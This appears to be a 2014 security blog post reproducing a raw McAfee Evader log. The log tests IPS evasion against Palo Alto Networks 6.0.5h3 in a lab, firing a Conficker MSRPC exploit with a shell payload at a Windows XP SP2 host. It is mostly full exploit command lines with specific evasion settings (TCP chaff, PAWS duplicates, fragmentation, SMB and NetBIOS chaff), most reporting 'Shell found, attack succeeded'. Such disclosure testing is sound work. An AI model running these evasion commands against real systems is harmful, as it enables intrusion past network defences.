netsecvulns

Palo Alto Networks 6.0.5h3 IPS evasion techniques with McAfee Evader

Oct 27th, 2014
Palo Alto Networks 6.0.5h3 IPS evasion techniques with McAfee Evader

Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.75 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=14 --min_evasions=2 --max_evasions=2 --passthrough --verifydelay=1000"
2014-10-27 15:22:24 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
2014-10-27 15:22:24 INFO Victim check disabled - will NOT notice if victim is no longer running
2014-10-27 15:22:26 INFO Using rand seed JQq8JjefWhc=
2014-10-27 15:22:26 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)

0 runs averaging 0.00 runs / second ; progress: 1/43200.........................2014-10-27 15:22:31 INFO
Success. (10.62.90.85):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30734 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=dkmOr3BFy8E --evasion=[smb_opentree,end]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"2","chksum|nullchksum|shorthdr|longhdr","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed dkmOr3BFy8F
The following evasions are applied from stage smb_opentree to end:
- Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
* Invalid TCP checksum.
* NULL TCP checksum.
* TCP header shorter than 20 bytes
* TCP header longer than packet total size
* Duplicate packet has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.85:30734 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....................
47 runs averaging 7.21 runs / second ; progress: 7/43200............................
75 runs averaging 6.42 runs / second ; progress: 12/43200...............................
106 runs averaging 6.31 runs / second ; progress: 17/43200.......................................
145 runs averaging 6.63 runs / second ; progress: 22/43200..................................
179 runs averaging 6.63 runs / second ; progress: 27/43200..........................
205 runs averaging 6.40 runs / second ; progress: 32/43200.....................2014-10-27 15:23:03 INFO
Success. (10.62.90.84):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61157 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DHLLZZ7NwVU --evasion=[smb_connect,msrpc_bind]ipv4_frag,"48" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435454","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed DHLLZZ7NwVU
The following evasions are applied from stage netbios_connect to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
The following evasions are applied from stage smb_connect to msrpc_bind:
- IPv4 fragments with at most 48 bytes per fragment

Info: NetBIOS connection 10.62.90.84:61157 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.2014-10-27 15:23:03 INFO
Success. (10.62.90.85):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39930 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=cusywtjt92o --evasion=[smb_opentree,end]smb_writeandxpad,"10","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"2","nullflag","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed cusywtjt92p
The following evasions are applied from stage smb_opentree to end:
- 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
* NULL TCP control flags.
* Duplicate packet has original payload with alphabetic bytes randomized

Info: NetBIOS connection 10.62.90.85:39930 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
..
231 runs averaging 6.22 runs / second ; progress: 37/43200................................
263 runs averaging 6.23 runs / second ; progress: 42/43200..........2014-10-27 15:23:11 INFO
Success. (10.62.90.79):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15672 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=HZ3Sa7z//Is --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed HZ3Sa7z//Is
The following evasions are applied from stage smb_connect to msrpc_req:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
The following evasions are applied from stage smb_opentree to smb_openpipe:
- Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has shuffled TCP payload

Info: NetBIOS connection 10.62.90.79:15672 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.............2014-10-27 15:23:13 INFO
Success. (10.62.90.79):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17963 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=B6RhIk0V4V8 --evasion=[smb_connect,end]tcp_paws,"75%","9","random_alpha" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"4","53977" --verifydelay=1000 --payload=shell
Info: Using random seed B6RhIk0V4V8
The following evasions are applied from stage smb_connect to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
The following evasions are applied from stage smb_connect to msrpc_bind:
- TCP packets are segmented to contain between 4 and 53977 bytes of payload.

Info: NetBIOS connection 10.62.90.79:17963 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
....................
308 runs averaging 6.44 runs / second ; progress: 48/43200...........................
335 runs averaging 6.33 runs / second ; progress: 53/43200....................
355 runs averaging 6.12 runs / second ; progress: 58/43200......
361 runs averaging 5.72 runs / second ; progress: 63/43200..2014-10-27 15:23:31 INFO
Success. (10.62.90.84):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37695 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=93wLI55/9xM --evasion=[smb_connect,msrpc_req]netbios_chaff,"2","empty_unspec|small_unspec|broken_length" --evasion=[start,msrpc_req]tcp_chaff,"1","nullflag","random" --verifydelay=1000 --payload=shell
Info: Using random seed 93wLI55/9xP
The following evasions are applied from stage start to msrpc_req:
- With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
* NULL TCP control flags.
* Duplicate packet has random bytes as payload
The following evasions are applied from stage smb_connect to msrpc_req:
- Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.

Info: NetBIOS connection 10.62.90.84:37695 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..............
378 runs averaging 5.55 runs / second ; progress: 68/43200......................
400 runs averaging 5.47 runs / second ; progress: 73/43200..2014-10-27 15:23:40 INFO
Success. (10.62.90.79):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14521 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=20G1uxuzLX0 --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","146896369","random" --verifydelay=1000 --payload=shell
Info: Using random seed 20G1uxuzLX3
The following evasions are applied from stage smb_connect to smb_openpipe:
- Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
The following evasions are applied from stage smb_opentree to end:
- Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 146896369> and has random bytes as payload

Info: NetBIOS connection 10.62.90.79:14521 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...............2014-10-27 15:23:43 INFO
Success. (10.62.90.84):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33059 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=yCX702BvsoY --evasion=[start,msrpc_req]tcp_paws,"75%","268435454","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"13","268435455","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed yCX702Bvsob
The following evasions are applied from stage start to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.84:33059 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
..............
433 runs averaging 5.53 runs / second ; progress: 78/43200....................
453 runs averaging 5.44 runs / second ; progress: 83/432002014-10-27 15:23:50 INFO
Success. (10.62.90.87):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.87 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63063 --extra=bindport=10012 --verifydelay=200 --obfuscate --randseed=BGefIIMzPSI --evasion=[smb_connect,msrpc_bind]tcp_chaff,"13","chksum|nullchksum|nullflag","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
Info: Using random seed BGefIIMzPSI
The following evasions are applied from stage smb_connect to msrpc_bind:
- With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
* Invalid TCP checksum.
* NULL TCP checksum.
* NULL TCP control flags.
* Duplicate packet has random alpha bytes as payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload

Info: NetBIOS connection 10.62.90.87:63063 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...............
469 runs averaging 5.31 runs / second ; progress: 88/43200.................
486 runs averaging 5.21 runs / second ; progress: 93/43200.......................
509 runs averaging 5.17 runs / second ; progress: 98/43200..................
527 runs averaging 5.10 runs / second ; progress: 103/432002014-10-27 15:24:10 INFO
Success. (10.62.90.81):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.81 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21544 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=WcNFwRScpy0 --evasion=[start,end]tcp_paws,"1","18663179","unmodified" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","28078968","random" --verifydelay=1000 --payload=shell
Info: Using random seed WcNFwRScpy1

The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 28078968> and has random bytes as payload

Info: NetBIOS connection 10.62.90.81:21544 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.........
537 runs averaging 4.95 runs / second ; progress: 108/43200...................
556 runs averaging 4.90 runs / second ; progress: 113/43200....................
576 runs averaging 4.86 runs / second ; progress: 119/43200......2014-10-27 15:24:26 INFO
Success. (10.62.90.85):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29127 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=blBNPp/vvrI --evasion=[smb_opentree,end]smb_decoytrees,"1","6","9","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435453","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed blBNPp/vvrJ
The following evasions are applied from stage smb_opentree to end:
- Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized

Info: NetBIOS connection 10.62.90.85:29127 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..............
597 runs averaging 4.83 runs / second ; progress: 124/43200.......................
620 runs averaging 4.82 runs / second ; progress: 129/43200.............................
649 runs averaging 4.86 runs / second ; progress: 134/43200.......2014-10-27 15:24:42 INFO
Success. (10.62.90.85):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36155 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=wP2OpZACf7k --evasion=[msrpc_req,end]tcp_chaff,"2","shorthdr|longhdr","random_alpha" --evasion=[start,end]tcp_paws,"3","268435455","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed wP2OpZACf7n
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
The following evasions are applied from stage msrpc_req to end:
- With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
* TCP header shorter than 20 bytes
* TCP header longer than packet total size
* Duplicate packet has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.85:36155 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
....................
677 runs averaging 4.88 runs / second ; progress: 139/43200...2014-10-27 15:24:46 INFO
Success. (10.62.90.88):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.88 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21972 --extra=bindport=10013 --verifydelay=200 --obfuscate --randseed=Q9f2ifNXKts --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_keepalive|small_unspec|msrpc_req|broken_length" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","zero" --verifydelay=1000 --payload=shell
Info: Using random seed Q9f2ifNXKtt
The following evasions are applied from stage smb_openpipe to end:
- Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
The following evasions are applied from stage msrpc_bind to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.88:21972 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....................
702 runs averaging 4.88 runs / second ; progress: 144/43200................
718 runs averaging 4.82 runs / second ; progress: 149/43200........
726 runs averaging 4.71 runs / second ; progress: 154/43200
726 runs averaging 4.57 runs / second ; progress: 159/43200.........
735 runs averaging 4.48 runs / second ; progress: 164/43200................
751 runs averaging 4.44 runs / second ; progress: 169/43200.......
758 runs averaging 4.35 runs / second ; progress: 174/43200...
761 runs averaging 4.25 runs / second ; progress: 179/43200..
763 runs averaging 4.14 runs / second ; progress: 184/43200..
765 runs averaging 4.04 runs / second ; progress: 189/43200..........
775 runs averaging 3.99 runs / second ; progress: 194/43200........
783 runs averaging 3.93 runs / second ; progress: 199/43200..............
797 runs averaging 3.90 runs / second ; progress: 204/43200.........
806 runs averaging 3.85 runs / second ; progress: 209/43200...................
825 runs averaging 3.85 runs / second ; progress: 214/43200.................
842 runs averaging 3.84 runs / second ; progress: 219/43200
842 runs averaging 3.75 runs / second ; progress: 224/43200
842 runs averaging 3.67 runs / second ; progress: 229/43200......
848 runs averaging 3.62 runs / second ; progress: 234/43200.........
857 runs averaging 3.58 runs / second ; progress: 239/43200.......
864 runs averaging 3.54 runs / second ; progress: 244/43200.....
869 runs averaging 3.48 runs / second ; progress: 249/43200............
881 runs averaging 3.46 runs / second ; progress: 254/43200........
889 runs averaging 3.43 runs / second ; progress: 259/43200.........
898 runs averaging 3.40 runs / second ; progress: 264/43200.......
905 runs averaging 3.36 runs / second ; progress: 270/43200.........
914 runs averaging 3.33 runs / second ; progress: 275/43200............
926 runs averaging 3.31 runs / second ; progress: 280/43200..........
936 runs averaging 3.29 runs / second ; progress: 285/43200.
937 runs averaging 3.24 runs / second ; progress: 290/43200
937 runs averaging 3.18 runs / second ; progress: 295/43200............
949 runs averaging 3.17 runs / second ; progress: 300/43200......Pid 17651 timed out - killed
2014-10-27 15:27:28 INFO
Timed out (10.62.90.83):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.83 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58677 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=W+mzqbTjctM --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","6","zero" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed W+mzqbTjctN
The following evasions are applied from stage netbios_connect to msrpc_bind:
- 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
The following evasions are applied from stage smb_opentree to msrpc_req:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.83:58677 -> 10.35.1.207:445
Terminated
.....2014-10-27 15:27:30 INFO
Success. (10.62.90.83):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.83 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29264 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=3Kb05auMcgU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","4","2","random_msrpcbind" --evasion=[smb_connect,smb_opentree]tcp_segvar,"1","37859" --verifydelay=1000 --payload=shell
Info: Using random seed 3Kb05auMcgX
The following evasions are applied from stage smb_connect to smb_opentree:
- TCP packets are segmented to contain between 1 and 37859 bytes of payload.
The following evasions are applied from stage smb_connect to msrpc_req:
- Before normal SMB writes, 6 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.

Info: NetBIOS connection 10.62.90.83:29264 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
......
968 runs averaging 3.18 runs / second ; progress: 305/43200..............
982 runs averaging 3.17 runs / second ; progress: 310/43200.........
991 runs averaging 3.15 runs / second ; progress: 315/43200...Pid 18473 timed out - killed
2014-10-27 15:27:43 INFO
Timed out (10.62.90.77):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.77 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45861 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4kN/lpcvPRQ --evasion=[msrpc_req,end]smb_chaff,"5","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
Info: Using random seed 4kN/lpcvPRT
The following evasions are applied from stage smb_opentree to msrpc_req:
- Add a zero urgent data byte to every 2 TCP segment.
The following evasions are applied from stage msrpc_req to end:
- Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload

Info: NetBIOS connection 10.62.90.77:45861 -> 10.35.1.207:445
Terminated
...2014-10-27 15:27:44 INFO
Success. (10.62.90.81):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.81 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31447 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=VbhSzUOE56A --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","639943","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed VbhSzUOE56B
The following evasions are applied from stage start to smb_connect:
- Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has shuffled TCP payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 639943> and has original payload with alphabetic bytes randomized

Info: NetBIOS connection 10.62.90.81:31447 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.Pid 18612 timed out - killed
2014-10-27 15:27:45 INFO
Timed out (10.62.90.78):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.78 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58917 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=tpwjgTYiV8k --evasion=[start,end]tcp_initialseq,"2" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
Info: Using random seed tpwjgTYiV8m
- Initial TCP sequence number is set to 0xffffffff - 2
The following evasions are applied from stage smb_opentree to msrpc_req:
- Add a zero urgent data byte to every 2 TCP segment.

Info: NetBIOS connection 10.62.90.78:58917 -> 10.35.1.207:445
Terminated
.....Pid 18682 timed out - killed
2014-10-27 15:27:46 INFO
Timed out (10.62.90.76):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.76 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63099 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wnzVAmbFo1U --evasion=[netbios_connect,smb_connect]tcp_chaff,"8","nullchksum|shorthdr","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed wnzVAmbFo1X
The following evasions are applied from stage netbios_connect to smb_connect:
- With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
* NULL TCP checksum.
* TCP header shorter than 20 bytes
* Duplicate packet has original payload with alphanumeric bytes randomized
The following evasions are applied from stage smb_openpipe to msrpc_req:
- 25% probability to add a random alphaurgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.76:63099 -> 10.35.1.207:445
Terminated
.
1008 runs averaging 3.15 runs / second ; progress: 320/43200..........................
1034 runs averaging 3.18 runs / second ; progress: 325/43200..Pid 19009 timed out - killed
2014-10-27 15:27:52 INFO
Timed out (10.62.90.75):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.75 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61686 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5R1r/jbFmrw --evasion=[smb_connect,smb_openpipe]ipv4_opt,"25%","inc","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed 5R1r/jbFmrz
The following evasions are applied from stage smb_connect to smb_openpipe:
- 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
The duplicate packet has random alphanumeric bytes as payload
The following evasions are applied from stage smb_openpipe to end:
- 75% probability to add a random alphanumeric urgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.75:61686 -> 10.35.1.207:445
Terminated
..........
1047 runs averaging 3.17 runs / second ; progress: 330/43200......
1053 runs averaging 3.14 runs / second ; progress: 335/43200......................
1075 runs averaging 3.16 runs / second ; progress: 340/43200......................
1097 runs averaging 3.18 runs / second ; progress: 345/43200............Pid 20186 timed out - killed
2014-10-27 15:28:15 INFO
Timed out (10.62.90.82):
/root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.82 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16086 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=P9jJCqtzPWA --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","7","2","zero" --evasion=[netbios_connect,end]tcp_paws,"3","3","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed P9jJCqtzPWA
The following evasions are applied from stage netbios_connect to end:
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
The following evasions are applied from stage smb_connect to smb_opentree:
- Before normal SMB writes, 2 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of zeroes.

Info: NetBIOS connection 10.62.90.82:16086 -> 10.35.1.207:445
Terminated
.........2014-10-27 15:28:16 INFO
Success. (10.62.90.79):

18927 runs averaging 2.89 runs / second ; progress: 6539/43200.....Interrupt registered, soft shutdown